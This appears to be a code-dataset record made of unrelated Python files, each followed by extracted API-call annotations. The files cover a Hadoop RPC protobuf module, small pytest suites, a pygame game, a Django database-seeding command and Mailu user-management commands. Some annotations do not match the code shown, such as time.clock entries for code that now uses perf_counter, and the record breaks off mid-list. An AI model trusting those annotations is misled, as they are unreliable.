  fields=[
    descriptor.FieldDescriptor(
      name='rpcKind', full_name='RpcPayloadHeaderProto.rpcKind', index=0,
      number=1, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    descriptor.FieldDescriptor(
      name='rpcOp', full_name='RpcPayloadHeaderProto.rpcOp', index=1,
      number=2, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    descriptor.FieldDescriptor(
      name='callId', full_name='RpcPayloadHeaderProto.callId', index=2,
      number=3, type=13, cpp_type=3, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  extension_ranges=[],
  serialized_start=26,
  serialized_end=139,
)
# Message descriptor: header sent with each RPC response.
_RPCRESPONSEHEADERPROTO = descriptor.Descriptor(
  name='RpcResponseHeaderProto',
  full_name='RpcResponseHeaderProto',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    descriptor.FieldDescriptor(
      name='callId', full_name='RpcResponseHeaderProto.callId', index=0,
      number=1, type=13, cpp_type=3, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    descriptor.FieldDescriptor(
      name='status', full_name='RpcResponseHeaderProto.status', index=1,
      number=2, type=14, cpp_type=8, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    descriptor.FieldDescriptor(
      name='serverIpcVersionNum', full_name='RpcResponseHeaderProto.serverIpcVersionNum', index=2,
      number=3, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  extension_ranges=[],
  serialized_start=141,
  serialized_end=243,
)
# Wire the enum-typed fields to their enum descriptors and register the
# message types on the file descriptor.
_RPCPAYLOADHEADERPROTO.fields_by_name['rpcKind'].enum_type = _RPCKINDPROTO
_RPCPAYLOADHEADERPROTO.fields_by_name['rpcOp'].enum_type = _RPCPAYLOADOPERATIONPROTO
_RPCRESPONSEHEADERPROTO.fields_by_name['status'].enum_type = _RPCSTATUSPROTO
DESCRIPTOR.message_types_by_name['RpcPayloadHeaderProto'] = _RPCPAYLOADHEADERPROTO
DESCRIPTOR.message_types_by_name['RpcResponseHeaderProto'] = _RPCRESPONSEHEADERPROTO
class RpcPayloadHeaderProto(message.Message):
  # Concrete message class; reflection fills in fields from DESCRIPTOR.
  __metaclass__ = reflection.GeneratedProtocolMessageType
  DESCRIPTOR = _RPCPAYLOADHEADERPROTO
  # @@protoc_insertion_point(class_scope:RpcPayloadHeaderProto)
class RpcResponseHeaderProto(message.Message):
  # Concrete message class; reflection fills in fields from DESCRIPTOR.
  __metaclass__ = reflection.GeneratedProtocolMessageType
  DESCRIPTOR = _RPCRESPONSEHEADERPROTO
  # @@protoc_insertion_point(class_scope:RpcResponseHeaderProto)
# @@protoc_insertion_point(module_scope)
| [
"google.protobuf.descriptor.EnumValueDescriptor",
"google.protobuf.descriptor.FieldDescriptor",
"google.protobuf.descriptor.FileDescriptor"
] | [((269, 1219), 'google.protobuf.descriptor.FileDescriptor', 'descriptor.FileDescriptor', ([], {'name': '"""RpcPayloadHeader.proto"""', 'package': '""""""', 'serialized_pb': '\'\\n\\x16RpcPayloadHeader.proto"q\\n\\x15RpcPayloadHeaderProto\\x12\\x1e\\n\\x07rpcKind\\x18\\x01 \\x01(\\x0e2\\r.RpcKindProto\\x12(\\n\\x05rpcOp\\x18\\x02 \\x01(\\x0e2\\x19.RpcPayloadOperationProto\\x12\\x0e\\n\\x06callId\\x18\\x03 \\x02(\\r"f\\n\\x16RpcResponseHeaderProto\\x12\\x0e\\n\\x06callId\\x18\\x01 \\x02(\\r\\x12\\x1f\\n\\x06status\\x18\\x02 \\x02(\\x0e2\\x0f.RpcStatusProto\\x12\\x1b\\n\\x13serverIpcVersionNum\\x18\\x03 \\x01(\\r*J\\n\\x0cRpcKindProto\\x12\\x0f\\n\\x0bRPC_BUILTIN\\x10\\x00\\x12\\x10\\n\\x0cRPC_WRITABLE\\x10\\x01\\x12\\x17\\n\\x13RPC_PROTOCOL_BUFFER\\x10\\x02*i\\n\\x18RpcPayloadOperationProto\\x12\\x15\\n\\x11RPC_FINAL_PAYLOAD\\x10\\x00\\x12\\x1c\\n\\x18RPC_CONTINUATION_PAYLOAD\\x10\\x01\\x12\\x18\\n\\x14RPC_CLOSE_CONNECTION\\x10\\x02*3\\n\\x0eRpcStatusProto\\x12\\x0b\\n\\x07SUCCESS\\x10\\x00\\x12\\t\\n\\x05ERROR\\x10\\x01\\x12\\t\\n\\x05FATAL\\x10\\x02B;\\n\\x1eorg.apache.hadoop.ipc.protobufB\\x16RpcPayloadHeaderProtos\\xa0\\x01\\x01\''}), '(name=\'RpcPayloadHeader.proto\', package=\'\',\n serialized_pb=\n \'\\n\\x16RpcPayloadHeader.proto"q\\n\\x15RpcPayloadHeaderProto\\x12\\x1e\\n\\x07rpcKind\\x18\\x01 \\x01(\\x0e2\\r.RpcKindProto\\x12(\\n\\x05rpcOp\\x18\\x02 \\x01(\\x0e2\\x19.RpcPayloadOperationProto\\x12\\x0e\\n\\x06callId\\x18\\x03 \\x02(\\r"f\\n\\x16RpcResponseHeaderProto\\x12\\x0e\\n\\x06callId\\x18\\x01 \\x02(\\r\\x12\\x1f\\n\\x06status\\x18\\x02 \\x02(\\x0e2\\x0f.RpcStatusProto\\x12\\x1b\\n\\x13serverIpcVersionNum\\x18\\x03 
\\x01(\\r*J\\n\\x0cRpcKindProto\\x12\\x0f\\n\\x0bRPC_BUILTIN\\x10\\x00\\x12\\x10\\n\\x0cRPC_WRITABLE\\x10\\x01\\x12\\x17\\n\\x13RPC_PROTOCOL_BUFFER\\x10\\x02*i\\n\\x18RpcPayloadOperationProto\\x12\\x15\\n\\x11RPC_FINAL_PAYLOAD\\x10\\x00\\x12\\x1c\\n\\x18RPC_CONTINUATION_PAYLOAD\\x10\\x01\\x12\\x18\\n\\x14RPC_CLOSE_CONNECTION\\x10\\x02*3\\n\\x0eRpcStatusProto\\x12\\x0b\\n\\x07SUCCESS\\x10\\x00\\x12\\t\\n\\x05ERROR\\x10\\x01\\x12\\t\\n\\x05FATAL\\x10\\x02B;\\n\\x1eorg.apache.hadoop.ipc.protobufB\\x16RpcPayloadHeaderProtos\\xa0\\x01\\x01\'\n )\n', (294, 1219), False, 'from google.protobuf import descriptor\n'), ((1394, 1492), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_BUILTIN"""', 'index': '(0)', 'number': '(0)', 'options': 'None', 'type': 'None'}), "(name='RPC_BUILTIN', index=0, number=0,\n options=None, type=None)\n", (1424, 1492), False, 'from google.protobuf import descriptor\n'), ((1513, 1612), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_WRITABLE"""', 'index': '(1)', 'number': '(1)', 'options': 'None', 'type': 'None'}), "(name='RPC_WRITABLE', index=1, number=1,\n options=None, type=None)\n", (1543, 1612), False, 'from google.protobuf import descriptor\n'), ((1633, 1740), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_PROTOCOL_BUFFER"""', 'index': '(2)', 'number': '(2)', 'options': 'None', 'type': 'None'}), "(name='RPC_PROTOCOL_BUFFER', index=2, number=\n 2, options=None, type=None)\n", (1663, 1740), False, 'from google.protobuf import descriptor\n'), ((2032, 2136), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_FINAL_PAYLOAD"""', 'index': '(0)', 'number': '(0)', 'options': 'None', 'type': 'None'}), "(name='RPC_FINAL_PAYLOAD', index=0, number=0,\n options=None, type=None)\n", (2062, 2136), False, 'from google.protobuf import 
descriptor\n'), ((2157, 2268), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_CONTINUATION_PAYLOAD"""', 'index': '(1)', 'number': '(1)', 'options': 'None', 'type': 'None'}), "(name='RPC_CONTINUATION_PAYLOAD', index=1,\n number=1, options=None, type=None)\n", (2187, 2268), False, 'from google.protobuf import descriptor\n'), ((2289, 2397), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_CLOSE_CONNECTION"""', 'index': '(2)', 'number': '(2)', 'options': 'None', 'type': 'None'}), "(name='RPC_CLOSE_CONNECTION', index=2, number\n =2, options=None, type=None)\n", (2319, 2397), False, 'from google.protobuf import descriptor\n'), ((2659, 2754), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""SUCCESS"""', 'index': '(0)', 'number': '(0)', 'options': 'None', 'type': 'None'}), "(name='SUCCESS', index=0, number=0, options=\n None, type=None)\n", (2689, 2754), False, 'from google.protobuf import descriptor\n'), ((2774, 2867), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""ERROR"""', 'index': '(1)', 'number': '(1)', 'options': 'None', 'type': 'None'}), "(name='ERROR', index=1, number=1, options=\n None, type=None)\n", (2804, 2867), False, 'from google.protobuf import descriptor\n'), ((2887, 2980), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""FATAL"""', 'index': '(2)', 'number': '(2)', 'options': 'None', 'type': 'None'}), "(name='FATAL', index=2, number=2, options=\n None, type=None)\n", (2917, 2980), False, 'from google.protobuf import descriptor\n'), ((3451, 3757), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""rpcKind"""', 'full_name': '"""RpcPayloadHeaderProto.rpcKind"""', 'index': '(0)', 'number': '(1)', 'type': '(14)', 'cpp_type': '(8)', 'label': '(1)', 
'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='rpcKind', full_name=\n 'RpcPayloadHeaderProto.rpcKind', index=0, number=1, type=14, cpp_type=8,\n label=1, has_default_value=False, default_value=0, message_type=None,\n enum_type=None, containing_type=None, is_extension=False,\n extension_scope=None, options=None)\n", (3477, 3757), False, 'from google.protobuf import descriptor\n'), ((3783, 4085), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""rpcOp"""', 'full_name': '"""RpcPayloadHeaderProto.rpcOp"""', 'index': '(1)', 'number': '(2)', 'type': '(14)', 'cpp_type': '(8)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='rpcOp', full_name=\n 'RpcPayloadHeaderProto.rpcOp', index=1, number=2, type=14, cpp_type=8,\n label=1, has_default_value=False, default_value=0, message_type=None,\n enum_type=None, containing_type=None, is_extension=False,\n extension_scope=None, options=None)\n", (3809, 4085), False, 'from google.protobuf import descriptor\n'), ((4111, 4415), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""callId"""', 'full_name': '"""RpcPayloadHeaderProto.callId"""', 'index': '(2)', 'number': '(3)', 'type': '(13)', 'cpp_type': '(3)', 'label': '(2)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='callId', full_name=\n 'RpcPayloadHeaderProto.callId', index=2, number=3, type=13, cpp_type=3,\n label=2, has_default_value=False, default_value=0, message_type=None,\n enum_type=None, 
containing_type=None, is_extension=False,\n extension_scope=None, options=None)\n", (4137, 4415), False, 'from google.protobuf import descriptor\n'), ((4807, 5112), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""callId"""', 'full_name': '"""RpcResponseHeaderProto.callId"""', 'index': '(0)', 'number': '(1)', 'type': '(13)', 'cpp_type': '(3)', 'label': '(2)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='callId', full_name=\n 'RpcResponseHeaderProto.callId', index=0, number=1, type=13, cpp_type=3,\n label=2, has_default_value=False, default_value=0, message_type=None,\n enum_type=None, containing_type=None, is_extension=False,\n extension_scope=None, options=None)\n", (4833, 5112), False, 'from google.protobuf import descriptor\n'), ((5138, 5443), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""status"""', 'full_name': '"""RpcResponseHeaderProto.status"""', 'index': '(1)', 'number': '(2)', 'type': '(14)', 'cpp_type': '(8)', 'label': '(2)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='status', full_name=\n 'RpcResponseHeaderProto.status', index=1, number=2, type=14, cpp_type=8,\n label=2, has_default_value=False, default_value=0, message_type=None,\n enum_type=None, containing_type=None, is_extension=False,\n extension_scope=None, options=None)\n", (5164, 5443), False, 'from google.protobuf import descriptor\n'), ((5469, 5802), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""serverIpcVersionNum"""', 'full_name': '"""RpcResponseHeaderProto.serverIpcVersionNum"""', 'index': '(2)', 'number': '(3)', 'type': 
'(13)', 'cpp_type': '(3)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='serverIpcVersionNum', full_name=\n 'RpcResponseHeaderProto.serverIpcVersionNum', index=2, number=3, type=\n 13, cpp_type=3, label=1, has_default_value=False, default_value=0,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, options=None)\n", (5495, 5802), False, 'from google.protobuf import descriptor\n')] |
from dirs import User
def test_config_home():
    """The user's config home must exist as a directory."""
    home = User.config_home()
    assert home.is_dir()
def test_cache_home():
    """The user's cache home must exist as a directory."""
    home = User.cache_home()
    assert home.is_dir()
def test_data_home():
    """The user's data home must exist as a directory."""
    home = User.data_home()
    assert home.is_dir()
def test_data(user: User):
    """The fixture's data directory matches ``User.data_home()``."""
    expected = User.data_home()
    assert user.data == expected
def test_config(user: User):
    """The fixture's config directory matches ``User.config_home()`` and exists."""
    expected = User.config_home()
    assert user.config == expected
    assert user.config.is_dir()
def test_cache(user: User):
    """The fixture's cache directory matches ``User.cache_home()`` and exists.

    Fixes a copy-paste slip: the original asserted ``user.config.is_dir()``
    here (copied from test_config), leaving the cache directory unchecked.
    """
    assert user.cache == User.cache_home()
    assert user.cache.is_dir()
"dirs.User.data_home",
"dirs.User.cache_home",
"dirs.User.config_home"
] | [((264, 280), 'dirs.User.data_home', 'User.data_home', ([], {}), '()\n', (278, 280), False, 'from dirs import User\n'), ((338, 356), 'dirs.User.config_home', 'User.config_home', ([], {}), '()\n', (354, 356), False, 'from dirs import User\n'), ((444, 461), 'dirs.User.cache_home', 'User.cache_home', ([], {}), '()\n', (459, 461), False, 'from dirs import User\n'), ((59, 77), 'dirs.User.config_home', 'User.config_home', ([], {}), '()\n', (75, 77), False, 'from dirs import User\n'), ((123, 140), 'dirs.User.cache_home', 'User.cache_home', ([], {}), '()\n', (138, 140), False, 'from dirs import User\n'), ((185, 201), 'dirs.User.data_home', 'User.data_home', ([], {}), '()\n', (199, 201), False, 'from dirs import User\n')] |
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: alien_invasion
Description : 武装飞船:游戏入口 !!!
Author : cat
date: 2018/1/22
-------------------------------------------------
Change Activity:
2018/1/22:
-------------------------------------------------
"""
import logging
import pygame
from armed import game_functions as gf
from armed.settings import Settings
from armed.ship import Ship
# Set the minimum level shown by the root logger.
logging.getLogger().setLevel(logging.DEBUG)
def run_game():
    """Initialize pygame, build the game objects and run the main loop.

    Removed the unused local ``bg_color`` and the dead commented-out
    resolution tuple; comments translated to English.
    """
    # Initialize the game and create a screen surface.
    pygame.init()
    ai_settings = Settings()
    screen = pygame.display.set_mode((ai_settings.screen_width, ai_settings.screen_height))
    pygame.display.set_caption("Alien Invasion")
    ship = Ship(screen)
    # Main loop: poll input, update state, redraw every frame.
    while True:
        gf.check_events(ship)
        ship.update(ai_settings)
        gf.update_screen(ai_settings, screen, ship)


if __name__ == "__main__":
    run_game()
| [
"logging.getLogger",
"pygame.init",
"pygame.display.set_mode",
"armed.game_functions.check_events",
"armed.settings.Settings",
"pygame.display.set_caption",
"armed.game_functions.update_screen",
"armed.ship.Ship"
] | [((586, 599), 'pygame.init', 'pygame.init', ([], {}), '()\n', (597, 599), False, 'import pygame\n'), ((681, 691), 'armed.settings.Settings', 'Settings', ([], {}), '()\n', (689, 691), False, 'from armed.settings import Settings\n'), ((706, 784), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(ai_settings.screen_width, ai_settings.screen_height)'], {}), '((ai_settings.screen_width, ai_settings.screen_height))\n', (729, 784), False, 'import pygame\n'), ((789, 833), 'pygame.display.set_caption', 'pygame.display.set_caption', (['"""Alien Invasion"""'], {}), "('Alien Invasion')\n", (815, 833), False, 'import pygame\n'), ((846, 858), 'armed.ship.Ship', 'Ship', (['screen'], {}), '(screen)\n', (850, 858), False, 'from armed.ship import Ship\n'), ((499, 518), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (516, 518), False, 'import logging\n'), ((920, 941), 'armed.game_functions.check_events', 'gf.check_events', (['ship'], {}), '(ship)\n', (935, 941), True, 'from armed import game_functions as gf\n'), ((1003, 1046), 'armed.game_functions.update_screen', 'gf.update_screen', (['ai_settings', 'screen', 'ship'], {}), '(ai_settings, screen, ship)\n', (1019, 1046), True, 'from armed import game_functions as gf\n')] |
"""snakeoil-based pytest fixtures"""
import pytest
from . import random_str
class TempDir:
    """Provide temporary directory to every test method."""
    @pytest.fixture(autouse=True)
    def __setup(self, tmpdir):
        # Autouse fixture: applied to every test in subclasses; the
        # name is mangled so subclasses cannot accidentally override it.
        # ``tmpdir`` is pytest's per-test temporary directory.
        self.dir = str(tmpdir)
class RandomPath:
    """Provide random path in a temporary directory to every test method."""
    @pytest.fixture(autouse=True)
    def __setup(self, tmpdir):
        # Join a random 10-character filename onto pytest's per-test tmpdir.
        filename = random_str(10)
        self.path = str(tmpdir.join(filename))
| [
"pytest.fixture"
] | [((161, 189), 'pytest.fixture', 'pytest.fixture', ([], {'autouse': '(True)'}), '(autouse=True)\n', (175, 189), False, 'import pytest\n'), ((355, 383), 'pytest.fixture', 'pytest.fixture', ([], {'autouse': '(True)'}), '(autouse=True)\n', (369, 383), False, 'import pytest\n')] |
from django.core.management.base import BaseCommand, CommandError
#Fixture package
from mixer.backend.django import mixer
#Test package & Utils
from django.test import TestCase
import pytest
import time, random
#models
from applications.brandcolors.models import Startup
from applications.brandcolors.models import StartupColor
from applications.brandcolors.models import Fabric
from mixer.backend.django import mixer
from django.contrib.auth.models import User
try:
from secrets import choice
except:
from random import choice
from random import randint
import json
from pprint import pprint
from webcolors import hex_to_rgb
class Command(BaseCommand):
    """Management command that wipes and re-seeds the brand-colors data.

    Fixes: ``time.clock()`` (removed in Python 3.8) replaced with
    ``time.perf_counter()``; elapsed time now subtracts ``start``;
    bare ``except:`` narrowed to ``except Exception:``; dead code removed.
    """
    from faker import Factory
    fake = Factory.create()
    from mixer.backend.django import mixer

    help = 'Seeding the database'

    def handle(self, *args, **options):
        # perf_counter() is the documented replacement for the removed
        # time.clock() and measures elapsed wall time reliably.
        start = time.perf_counter()
        # Wipe previously seeded rows so the command is idempotent.
        Startup.objects.all().delete()
        StartupColor.objects.all().delete()
        Fabric.objects.all().delete()
        self.stdout.write(
            self.style.SUCCESS(
                'Successfully Delete the Models \n\tNumber of users in the db: {} '.format(User.objects.all().count())
            )
        )
        try:
            # Admin user (may already exist when the command is re-run).
            user = User.objects.create_user('admin', password='(<PASSWORD>)')
            user.is_superuser = True
            user.save()
            # Create 15 random users as fixtures.
            mixer.cycle(15).blend(User)
        except Exception:
            # Best-effort seeding: tolerate duplicates on re-runs, but no
            # longer swallow KeyboardInterrupt/SystemExit via bare except.
            pass
        users = User.objects.all()
        with open('fixtures/brandcolors.json') as data_file:
            data = json.load(data_file)
        for brand in data:
            # One Startup per brand entry in the fixture file.
            Startup.objects.create(
                title=str(data.get(brand).get('title')),
                slug=data.get(brand).get('slug'),
                source_url=data.get(brand).get('source_url'),
                brand_url=data.get(brand).get('brand_url')
            )
            brand_name = Startup.objects.last()
            pprint(data.get(brand).get('title'))
            colors = data.get(brand).get('colors')
            for color in colors:
                # Store each palette entry together with its RGB components.
                r, g, b = hex_to_rgb('#' + color)
                StartupColor.objects.create(color='#' + color, startup=brand_name, red=r, green=g, blue=b)
        self.stdout.write(
            self.style.SUCCESS(
                'Successfully Seeding Models \n\tNumber of users in the db: %s ' % len(users)
            )
        )
        # Report elapsed time as h:m:s (the original forgot to subtract
        # ``start`` from the counter reading).
        elapsed = time.perf_counter() - start
        hours = elapsed // 3600
        elapsed = elapsed - 3600 * hours
        minutes = elapsed // 60
        seconds = elapsed - 60 * minutes
        self.stdout.write(
            self.style.SUCCESS(
                'Created a User < admin > with password < (<PASSWORD>) > for you to login.'
            )
        )
        self.stdout.write(
            self.style.SUCCESS(
                '\n\nTime elapse: %d:%d:%d' % (hours, minutes, seconds)
            )
        )
| [
"applications.brandcolors.models.Fabric.objects.all",
"applications.brandcolors.models.StartupColor.objects.create",
"time.clock",
"webcolors.hex_to_rgb",
"applications.brandcolors.models.Startup.objects.all",
"applications.brandcolors.models.StartupColor.objects.all",
"mixer.backend.django.mixer.cycle"... | [((715, 731), 'faker.Factory.create', 'Factory.create', ([], {}), '()\n', (729, 731), False, 'from faker import Factory\n'), ((867, 879), 'time.clock', 'time.clock', ([], {}), '()\n', (877, 879), False, 'import time, random\n'), ((1505, 1523), 'django.contrib.auth.models.User.objects.all', 'User.objects.all', ([], {}), '()\n', (1521, 1523), False, 'from django.contrib.auth.models import User\n'), ((2701, 2713), 'time.clock', 'time.clock', ([], {}), '()\n', (2711, 2713), False, 'import time, random\n'), ((1266, 1324), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', (['"""admin"""'], {'password': '"""(<PASSWORD>)"""'}), "('admin', password='(<PASSWORD>)')\n", (1290, 1324), False, 'from django.contrib.auth.models import User\n'), ((1605, 1625), 'json.load', 'json.load', (['data_file'], {}), '(data_file)\n', (1614, 1625), False, 'import json\n'), ((2131, 2153), 'applications.brandcolors.models.Startup.objects.last', 'Startup.objects.last', ([], {}), '()\n', (2151, 2153), False, 'from applications.brandcolors.models import Startup\n'), ((888, 909), 'applications.brandcolors.models.Startup.objects.all', 'Startup.objects.all', ([], {}), '()\n', (907, 909), False, 'from applications.brandcolors.models import Startup\n'), ((927, 953), 'applications.brandcolors.models.StartupColor.objects.all', 'StartupColor.objects.all', ([], {}), '()\n', (951, 953), False, 'from applications.brandcolors.models import StartupColor\n'), ((971, 991), 'applications.brandcolors.models.Fabric.objects.all', 'Fabric.objects.all', ([], {}), '()\n', (989, 991), False, 'from applications.brandcolors.models import Fabric\n'), ((2351, 2374), 'webcolors.hex_to_rgb', 'hex_to_rgb', (["('#' + color)"], {}), "('#' + color)\n", (2361, 2374), False, 'from webcolors import hex_to_rgb\n'), ((2389, 2483), 'applications.brandcolors.models.StartupColor.objects.create', 'StartupColor.objects.create', ([], {'color': "('#' + color)", 
'startup': 'brand_name', 'red': 'r', 'green': 'g', 'blue': 'b'}), "(color='#' + color, startup=brand_name, red=r,\n green=g, blue=b)\n", (2416, 2483), False, 'from applications.brandcolors.models import StartupColor\n'), ((1427, 1442), 'mixer.backend.django.mixer.cycle', 'mixer.cycle', (['(15)'], {}), '(15)\n', (1438, 1442), False, 'from mixer.backend.django import mixer\n'), ((1151, 1169), 'django.contrib.auth.models.User.objects.all', 'User.objects.all', ([], {}), '()\n', (1167, 1169), False, 'from django.contrib.auth.models import User\n')] |
from mailu import app, manager, db
from mailu.admin import models
@manager.command
def admin(localpart, domain_name, password):
    """ Create an admin user
    """
    # Get-or-create the domain the admin account lives in.
    domain = models.Domain.query.get(domain_name)
    if domain is None:
        domain = models.Domain(name=domain_name)
        db.session.add(domain)
    # Build the account with global admin rights and persist it.
    account = models.User(localpart=localpart, domain=domain, global_admin=True)
    account.set_password(password)
    db.session.add(account)
    db.session.commit()
@manager.command
def user(localpart, domain_name, password, hash_scheme=None):
    """ Create a user
    """
    # Resolve the scheme at call time: the old default
    # ``app.config['PASSWORD_SCHEME']`` was evaluated once at import,
    # freezing whatever the config held at that moment.
    if hash_scheme is None:
        hash_scheme = app.config['PASSWORD_SCHEME']
    domain = models.Domain.query.get(domain_name)
    if not domain:
        domain = models.Domain(name=domain_name)
        db.session.add(domain)
    user = models.User(
        localpart=localpart,
        domain=domain,
        global_admin=False
    )
    user.set_password(password, hash_scheme=hash_scheme)
    db.session.add(user)
    db.session.commit()
@manager.command
def user_import(localpart, domain_name, password_hash, hash_scheme=None):
    """ Import a user along with password hash. Available hashes:
        'SHA512-CRYPT'
        'SHA256-CRYPT'
        'MD5-CRYPT'
        'CRYPT'
    """
    # Resolve the scheme at call time: the old default
    # ``app.config['PASSWORD_SCHEME']`` was evaluated once at import,
    # freezing whatever the config held at that moment.
    if hash_scheme is None:
        hash_scheme = app.config['PASSWORD_SCHEME']
    domain = models.Domain.query.get(domain_name)
    if not domain:
        domain = models.Domain(name=domain_name)
        db.session.add(domain)
    user = models.User(
        localpart=localpart,
        domain=domain,
        global_admin=False
    )
    # raw=True stores the supplied hash verbatim instead of re-hashing.
    user.set_password(password_hash, hash_scheme=hash_scheme, raw=True)
    db.session.add(user)
    db.session.commit()
@manager.command
def config_update(delete_objects=False):
    """sync configuration with data from YAML-formatted stdin"""
    import yaml, sys
    # safe_load only builds plain Python objects; plain yaml.load() on
    # stdin can instantiate arbitrary objects (code execution) and is
    # deprecated without an explicit Loader since PyYAML 5.1.
    new_config = yaml.safe_load(sys.stdin)
    # --- users -----------------------------------------------------------
    users = new_config['users']
    tracked_users = set()
    for user_config in users:
        localpart = user_config['localpart']
        domain_name = user_config['domain']
        password_hash = user_config['password_hash']
        hash_scheme = user_config['hash_scheme']
        domain = models.Domain.query.get(domain_name)
        email = '{0}@{1}'.format(localpart, domain_name)
        if not domain:
            domain = models.Domain(name=domain_name)
            db.session.add(domain)
        user = models.User.query.get(email)
        tracked_users.add(email)
        if not user:
            user = models.User(
                localpart=localpart,
                domain=domain,
                global_admin=False
            )
        # Always refresh the password so edits in the YAML take effect.
        user.set_password(password_hash, hash_scheme=hash_scheme, raw=True)
        db.session.add(user)
    # --- aliases ---------------------------------------------------------
    aliases = new_config['aliases']
    tracked_aliases = set()
    for alias_config in aliases:
        localpart = alias_config['localpart']
        domain_name = alias_config['domain']
        destination = alias_config['destination']
        domain = models.Domain.query.get(domain_name)
        email = '{0}@{1}'.format(localpart, domain_name)
        if not domain:
            domain = models.Domain(name=domain_name)
            db.session.add(domain)
        alias = models.Alias.query.get(email)
        tracked_aliases.add(email)
        if not alias:
            alias = models.Alias(
                localpart=localpart,
                domain=domain,
                destination=destination.split(','),
                email=email
            )
        else:
            alias.destination = destination.split(',')
        db.session.add(alias)
    if delete_objects:
        # Remove users/aliases present in the DB but absent from the YAML.
        for user in db.session.query(models.User).all():
            if not ( user.email in tracked_users ):
                db.session.delete(user)
        for alias in db.session.query(models.Alias).all():
            if not ( alias.email in tracked_aliases ):
                db.session.delete(alias)
    db.session.commit()
@manager.command
def user_delete(email):
"""delete user"""
user = models.User.query.get(email)
if user:
db.session.delete(user)
db.session.commit()
@manager.command
def alias_delete(email):
"""delete alias"""
alias = models.Alias.query.get(email)
if alias:
db.session.delete(alias)
db.session.commit()
@manager.command
def alias(localpart, domain_name, destination):
""" Create an alias
"""
domain = models.Domain.query.get(domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
alias = models.Alias(
localpart=localpart,
domain=domain,
destination=destination.split(','),
email="%s@%s" % (localpart, domain_name)
)
db.session.add(alias)
db.session.commit()
# Set limits to a domain
@manager.command
def setlimits(domain_name, max_users, max_aliases, max_quota_bytes):
domain = models.Domain.query.get(domain_name)
domain.max_users = max_users
domain.max_aliases = max_aliases
domain.max_quota_bytes = max_quota_bytes
db.session.add(domain)
db.session.commit()
# Make the user manager of a domain
@manager.command
def setmanager(domain_name, user_name='manager'):
domain = models.Domain.query.get(domain_name)
manageruser = models.User.query.get(user_name + '@' + domain_name)
domain.managers.append(manageruser)
db.session.add(domain)
db.session.commit()
if __name__ == "__main__":
manager.run()
| [
"mailu.admin.models.Domain",
"mailu.db.session.add",
"yaml.load",
"mailu.db.session.query",
"mailu.admin.models.Domain.query.get",
"mailu.admin.models.User.query.get",
"mailu.manager.run",
"mailu.admin.models.Alias.query.get",
"mailu.db.session.delete",
"mailu.admin.models.User",
